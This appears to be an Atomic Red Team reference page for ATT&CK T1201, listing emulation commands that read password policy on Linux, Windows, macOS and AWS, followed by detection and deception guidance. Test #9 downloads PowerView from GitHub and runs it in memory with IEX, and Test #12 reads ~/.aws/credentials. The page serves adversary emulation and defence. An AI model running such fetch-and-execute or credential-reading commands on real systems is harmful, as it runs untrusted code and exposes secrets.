T1201 - Password Policy Discovery

Adversaries may attempt to access detailed information about the password policy used within an enterprise network or cloud environment. Password policies are a way to enforce complex passwords that are difficult to guess or crack through Brute Force. This information may help the adversary to create a list of common passwords and launch dictionary and/or brute force attacks that adhere to the policy (e.g. if the minimum password length is 8, then not trying passwords such as ‘pass123’; not checking more than 3-4 passwords per account if the lockout threshold is set to 6, so as not to lock out accounts).

Password policies can be set and discovered on Windows, Linux, and macOS systems via various command shell utilities such as net accounts (/domain), Get-ADDefaultDomainPasswordPolicy, chage -l, cat /etc/pam.d/common-password, and pwpolicy getaccountpolicies (Citation: Superuser Linux Password Policies) (Citation: Jamf User Password Policies). Adversaries may also leverage a Network Device CLI on network devices to discover password policy information (e.g. show aaa, show aaa common-criteria policy all). (Citation: US-CERT-TA18-106A)

Password policies can be discovered in cloud environments using available APIs such as GetAccountPasswordPolicy in AWS (Citation: AWS GetPasswordPolicy).

Atomic Tests

Atomic Test #1 - Examine password complexity policy - Ubuntu

Lists the password complexity policy to console on Ubuntu Linux.

Supported Platforms: linux

Attack Commands: Run with bash

cat /etc/pam.d/common-password
Invoke-AtomicTest T1201 -TestNumbers 1

Atomic Test #2 - Examine password complexity policy - FreeBSD

Lists the password complexity policy to console on FreeBSD.

Supported Platforms: linux

Attack Commands: Run with sh

cat /etc/pam.d/passwd
Invoke-AtomicTest T1201 -TestNumbers 2

Atomic Test #3 - Examine password complexity policy - CentOS/RHEL 7.x

Lists the password complexity policy to console on CentOS/RHEL 7.x Linux.

Supported Platforms: linux

Dependencies: Run with bash!

Description: System must be CentOS or RHEL v7
Check Prereq Commands:
if [ $(uname -a | grep -ioP 'el[0-9]' | grep -oP '[0-9]') -eq "7" ]; then exit 0; else exit 1; fi;
Get Prereq Commands:
echo Please run from CentOS or RHEL v7
Invoke-AtomicTest T1201 -TestNumbers 3 -GetPreReqs

Attack Commands: Run with bash

cat /etc/security/pwquality.conf
Invoke-AtomicTest T1201 -TestNumbers 3

Atomic Test #4 - Examine password complexity policy - CentOS/RHEL 6.x

Lists the password complexity policy to console on CentOS/RHEL 6.x Linux.

Supported Platforms: linux

Dependencies: Run with bash!

Description: System must be CentOS or RHEL v6
Check Prereq Commands:
if [ "$(rpm -q --queryformat '%{VERSION}' centos-release)" = "6" ]; then exit 0; else exit 1; fi;
Get Prereq Commands:
echo Please run from CentOS or RHEL v6
Invoke-AtomicTest T1201 -TestNumbers 4 -GetPreReqs

Attack Commands: Run with bash

cat /etc/pam.d/system-auth
cat /etc/security/pwquality.conf
Invoke-AtomicTest T1201 -TestNumbers 4

Atomic Test #5 - Examine password expiration policy - All Linux

Lists the password expiration policy to console on CentOS/RHEL/Ubuntu.

Supported Platforms: linux

Attack Commands: Run with bash

cat /etc/login.defs
Invoke-AtomicTest T1201 -TestNumbers 5

Atomic Test #6 - Examine local password policy - Windows

Lists the local password policy to console on Windows.

Supported Platforms: windows

Attack Commands: Run with command_prompt

net accounts
Invoke-AtomicTest T1201 -TestNumbers 6

Atomic Test #7 - Examine domain password policy - Windows

Lists the domain password policy to console on Windows.

Supported Platforms: windows

Attack Commands: Run with command_prompt

net accounts /domain
Invoke-AtomicTest T1201 -TestNumbers 7

Atomic Test #8 - Examine password policy - macOS

Lists the password policy to console on macOS.

Supported Platforms: macos

Attack Commands: Run with bash

pwpolicy getaccountpolicies
Invoke-AtomicTest T1201 -TestNumbers 8

Atomic Test #9 - Get-DomainPolicy with PowerView

Utilizing PowerView, run Get-DomainPolicy to return the default domain policy or the domain controller policy for the current domain or a specified domain/domain controller.

Supported Platforms: windows

Attack Commands: Run with powershell

[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12
IEX (IWR 'https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/master/Recon/PowerView.ps1' -UseBasicParsing); Get-DomainPolicy -verbose
Invoke-AtomicTest T1201 -TestNumbers 9

Atomic Test #10 - Enumerate Active Directory Password Policy with get-addefaultdomainpasswordpolicy

The following Atomic test will utilize get-addefaultdomainpasswordpolicy to enumerate domain password policy. Upon successful execution a listing of the policy implemented will display.

Reference: https://docs.microsoft.com/en-us/powershell/module/activedirectory/get-addefaultdomainpasswordpolicy?view=windowsserver2022-ps

Supported Platforms: windows

Elevation Required (e.g. root or admin)

Attack Commands: Run with powershell

get-addefaultdomainpasswordpolicy
Invoke-AtomicTest T1201 -TestNumbers 10

Atomic Test #11 - Use of SecEdit.exe to export the local security policy (including the password policy)

SecEdit.exe can be used to export the current local security policy applied to a host.

Supported Platforms: windows

Elevation Required (e.g. root or admin)

Attack Commands: Run with command_prompt

secedit.exe /export /areas SECURITYPOLICY /cfg output_mysecpol.txt
Invoke-AtomicTest T1201 -TestNumbers 11

Atomic Test #12 - Examine AWS Password Policy

This atomic test will display details about the password policy for the current AWS account.

Supported Platforms: iaas:aws

Elevation Required (e.g. root or admin)

Dependencies: Run with sh!

Description: Check that the ~/.aws/credentials file has a default stanza configured
Check Prereq Commands:
grep "default" ~/.aws/credentials
Get Prereq Commands:
echo Please install the aws-cli and configure your AWS default profile using: aws configure
Invoke-AtomicTest T1201 -TestNumbers 12 -GetPreReqs

Attack Commands: Run with sh

aws iam get-account-password-policy
Invoke-AtomicTest T1201 -TestNumbers 12

Detection

Monitor logs and processes for tools and command line arguments that may indicate they’re being used for password policy discovery. Correlate that activity with other suspicious activity from the originating system to reduce potential false positives from valid user or administrator activity. Adversaries will likely attempt to find the password policy early in an operation and the activity is likely to happen with other Discovery activity.

Shield Active Defense

Software Manipulation

Make changes to a system’s software properties and functions to achieve a desired effect.

Software Manipulation allows a defender to alter or replace elements of the operating system, file system, or any other software installed and executed on a system.

Opportunity

In an adversary engagement operation, there is an opportunity to impact what an adversary sees when they execute commands on a system.

Use Case

A defender can alter the output of the password policy description so the adversary is unsure of exactly what the requirements are.

Procedures

Hook the Win32 Sleep() function so that it always performs a Sleep(1) instead of the intended duration. This can increase the speed at which dynamic analysis can be performed when a normal malicious file sleeps for long periods before attempting additional capabilities.

Hook the Win32 NetUserChangePassword() and modify it such that the new password is different from the one provided. The data passed into the function is encrypted along with the modified new password, then logged so a defender can get alerted about the change as well as decrypt the new password for use.

Alter the output of an adversary’s profiling commands to make newly-built systems look like the operating system was installed months earlier.

Alter the output of adversary recon commands to not show important assets, such as a file server containing sensitive data.